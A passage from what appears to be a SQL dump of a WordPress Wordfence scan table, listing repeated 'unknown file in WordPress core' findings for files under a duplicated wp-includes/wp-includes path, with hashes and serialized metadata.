malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/images/smilies/icon_rolleyes.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77455,1675048829,1675048829,'new','knownfile',75,'5952e8684cecd3602d538919737a8ebc','fbf0bc98b0b1aa14be140eb3453eb8c0','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_sad.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/icon_sad.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77456,1675048830,1675048830,'new','knownfile',75,'c928b96c7e9eed8b90ce3f4ab42854ec','1098aeea16423129e61c0441d1196ea7','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_smile.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/images/smilies/icon_smile.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77457,1675048830,1675048830,'new','knownfile',75,'bfc8d4dac1c9bc3c0b82897c22238872','75b126f943f751baf61751f24938c459','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_surprised.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/images/smilies/icon_surprised.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77458,1675048830,1675048830,'new','knownfile',75,'f3a516022d877a1c86a97af85231da74','33e2c44de46a8ffb80c398c0a1ebe0b6','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_twisted.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/icon_twisted.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77459,1675048830,1675048830,'new','knownfile',75,'5539d860a843d81a3c54cd741e500160','d26701119cbb2d06abac1c66fb474828','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/icon_wink.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/smilies/icon_wink.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77460,1675048830,1675048830,'new','knownfile',75,'eecd7a9a2df3b25c969d30ed7feaa3df','cb140fa1eff5056ff3c0acf75f2a34ab','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/mrgreen.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/smilies/mrgreen.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77461,1675048830,1675048830,'new','knownfile',75,'1432ab7f03bc6a570ca9fe735d4e4a78','6533191dd61d2472fa0ae401115efad3','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/rolleyes.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/smilies/rolleyes.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77462,1675048830,1675048830,'new','knownfile',75,'53a123e6ad19f3c3e4d0ff3ffa273d8f','7c21af4de499404b8aa1abee4850dbb0','Unknown file in WordPress core: wp-includes/wp-includes/images/smilies/simple-smile.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/smilies/simple-smile.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77463,1675048830,1675048830,'new','knownfile',75,'3f0259ecf1724186ca29c652fe412e09','36dd03b8f7315422ebd3ade18eba9486','Unknown file in WordPress core: wp-includes/wp-includes/images/spinner-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/spinner-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77464,1675048830,1675048830,'new','knownfile',75,'0de165ea9cec08b316b97df7e27f9460','085bdeb218991f9b985477df6396fa7f','Unknown file in WordPress core: wp-includes/wp-includes/images/spinner.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/images/spinner.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77465,1675048830,1675048830,'new','knownfile',75,'f482f23ac9eb35447ecccc9827b3e4dc','7f89e984b37d2553c35cb9f57353ebb5','Unknown file in WordPress core: wp-includes/wp-includes/images/toggle-arrow-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/toggle-arrow-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77466,1675048830,1675048830,'new','knownfile',75,'2c583f3ff8a8fc7363be7a3aba17e3c8','3719825f22e69192792bc5d4d2a79c1b','Unknown file in WordPress core: wp-includes/wp-includes/images/toggle-arrow.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/images/toggle-arrow.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77467,1675048830,1675048830,'new','knownfile',75,'801b94ddc4bb3aae1fc161f627bab64b','5acfeb975079bfd2c8235f2f90adae05','Unknown file in WordPress core: wp-includes/wp-includes/images/uploader-icons-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/images/uploader-icons-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77468,1675048830,1675048830,'new','knownfile',75,'3c07562cf35f65d61dbda600dbc93bb1','82ef2d04489fbc066ecae98cbe9183d5','Unknown file in WordPress core: wp-includes/wp-includes/images/uploader-icons.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/images/uploader-icons.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77469,1675048830,1675048830,'new','knownfile',75,'e2939a45010cdf0ee5d6895d39bce6fe','dc21a788521f7334d3baa9ed19719c0a','Unknown file in WordPress core: wp-includes/wp-includes/images/w-logo-blue-white-bg.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/images/w-logo-blue-white-bg.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77470,1675048830,1675048830,'new','knownfile',75,'57562017543f28d9fe7a5f9c91a975be','6f1b27c4a69a528d8e722085f2c80b10','Unknown file in WordPress core: wp-includes/wp-includes/images/w-logo-blue.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/w-logo-blue.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77471,1675048830,1675048830,'new','knownfile',75,'d1a06ddde0430e47e5a065ffe222d1a6','854d8408883dfef0930cf1cb44111aa1','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-comments.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/images/wlw/wp-comments.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77472,1675048830,1675048830,'new','knownfile',75,'d985ea1ffbd44ddfb8301a38a4efdf3e','c2436e8f29be1645f006906c088f7349','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-icon.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/images/wlw/wp-icon.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77473,1675048830,1675048830,'new','knownfile',75,'36173eed9e610be0ca49867c599147d5','227fb7297bb58af89d6d8194746bb2a2','Unknown file in WordPress core: wp-includes/wp-includes/images/wlw/wp-watermark.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/images/wlw/wp-watermark.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77474,1675048831,1675048831,'new','knownfile',75,'3626aa1fa66ec68aa5e3ea03d55bfd9a','41613803e281526724dd916dae369872','Unknown file in WordPress core: wp-includes/wp-includes/images/wpicons-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/images/wpicons-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77475,1675048831,1675048831,'new','knownfile',75,'8de2d0ac522dd95cc20571d8f1dccb4f','30b6cdcfb5225464a42d8ea474a8ae68','Unknown file in WordPress core: wp-includes/wp-includes/images/wpicons.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/images/wpicons.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77476,1675048831,1675048831,'new','knownfile',75,'f5d75340ccc590aa659aea76cb8ca990','6a8ff729d6d046043a7659d8bba9413d','Unknown file in WordPress core: wp-includes/wp-includes/images/wpspin-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/images/wpspin-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77477,1675048831,1675048831,'new','knownfile',75,'135cbd8861f29b040526bea83c73ff0b','d56caf17c006488fbcf3f40eac14b45a','Unknown file in WordPress core: wp-includes/wp-includes/images/wpspin.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/wpspin.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77478,1675048831,1675048831,'new','knownfile',75,'fd6c2f90419570d1af14769360443b30','79f54a0b5f14c8e1c79060ccc3436f69','Unknown file in WordPress core: wp-includes/wp-includes/images/xit-2x.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/images/xit-2x.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77479,1675048831,1675048831,'new','knownfile',75,'679c42ac75bcfdcf20733bfd42a3040f','2a9e4fa38c46b9e61a597fcb045edbdc','Unknown file in WordPress core: wp-includes/wp-includes/images/xit.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/images/xit.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77480,1675048831,1675048831,'new','knownfile',75,'6b56594499821f65e75be6697e581a85','965dc13f074b4599c0baec43ae9020c9','Unknown file in WordPress core: wp-includes/wp-includes/js/admin-bar.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/admin-bar.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77481,1675048831,1675048831,'new','knownfile',75,'4f70be370df42a86179beba0d8dbe1a8','e9f5151d37a6b047a2d8dc9cec33e353','Unknown file in WordPress core: wp-includes/wp-includes/js/admin-bar.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/admin-bar.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77482,1675048831,1675048831,'new','knownfile',75,'d23c65686d03fb213ff275e89d0c3824','7b91d19e194f804f25ac7bdfd339870a','Unknown file in WordPress core: wp-includes/wp-includes/js/api-request.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/api-request.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77483,1675048831,1675048831,'new','knownfile',75,'a51c9c379020c8d85fefb948874c3c30','d2166ed0781bea58baae551ce6516c80','Unknown file in WordPress core: wp-includes/wp-includes/js/api-request.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/api-request.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77484,1675048831,1675048831,'new','knownfile',75,'75bdef5d896e834477d4c0fc5e4b2e5c','57e1a811404dd974583eaa8ff3e1646b','Unknown file in WordPress core: wp-includes/wp-includes/js/autosave.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/autosave.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77485,1675048831,1675048831,'new','knownfile',75,'2cb77339c53a6fc33535c629478cd914','bf66969082ab3cbf800683f593b6849b','Unknown file in WordPress core: wp-includes/wp-includes/js/autosave.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/autosave.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77486,1675048831,1675048831,'new','knownfile',75,'905365db676c3bc5625a5ef617f281d1','6aa4569939be1d4114007219951f9e93','Unknown file in WordPress core: wp-includes/wp-includes/js/backbone.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/backbone.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77487,1675048831,1675048831,'new','knownfile',75,'06ae6de61d4ac8e62363208119b35faa','9d6bfbc2a517c52db0d2972f7893e15d','Unknown file in WordPress core: wp-includes/wp-includes/js/backbone.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/backbone.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77488,1675048831,1675048831,'new','knownfile',75,'d19d2f50439fdbab84e86a31153a8060','14f9d4c7e2c6ea93f0807f2a2adb2810','Unknown file in WordPress core: wp-includes/wp-includes/js/clipboard.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/clipboard.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77489,1675048831,1675048831,'new','knownfile',75,'e045caadbc687adb9efd8ea2b8880871','2b977d4395fcaa9e81566a563f419448','Unknown file in WordPress core: wp-includes/wp-includes/js/clipboard.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/clipboard.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77490,1675048832,1675048832,'new','knownfile',75,'2dadfa6e46e6c7a6a03f12987e6f6524','c7d3582c89c9e4bb668b987e5752cdb4','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/codemirror.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/codemirror/codemirror.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77491,1675048832,1675048832,'new','knownfile',75,'845389c262b5085f9ffa9ec1d86cca2b','478d3b2497125f7ccd350908f4b48ea1','Unknown file in WordPress core: wp-includes/wp-includes/js/codemirror/codemirror.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/codemirror/codemirror.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77492,1675048832,1675048832,'new','knownfile',75,'3974ce0decf98bf0744f37e6bae75f38','10da66140fcd5f63875a4b588e66de0c','Unknown file in WordPress 